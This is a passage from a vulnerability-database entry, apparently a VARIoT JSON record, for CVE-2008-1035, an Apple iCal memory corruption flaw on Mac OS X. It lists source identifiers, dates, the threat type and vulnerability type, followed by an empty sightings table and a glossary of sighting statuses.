"date": "2008-06-04T00:23:00", "db": "BID", "id": "29412" }, { "date": "2008-06-03T19:43:00", "db": "BID", "id": "29486" }, { "date": "2008-06-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2008-001405" }, { "date": "2021-07-14T00:00:00", "db": "CNNVD", "id": "CNNVD-200806-030" }, { "date": "2024-11-21T00:43:30.690000", "db": "NVD", "id": "CVE-2008-1035" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "29412" }, { "db": "BID", "id": "29486" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Apple Mac OS X of Apple iCal Memory corruption 
vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2008-001405" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-200806-030" } ], "trust": 0.6 } }
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.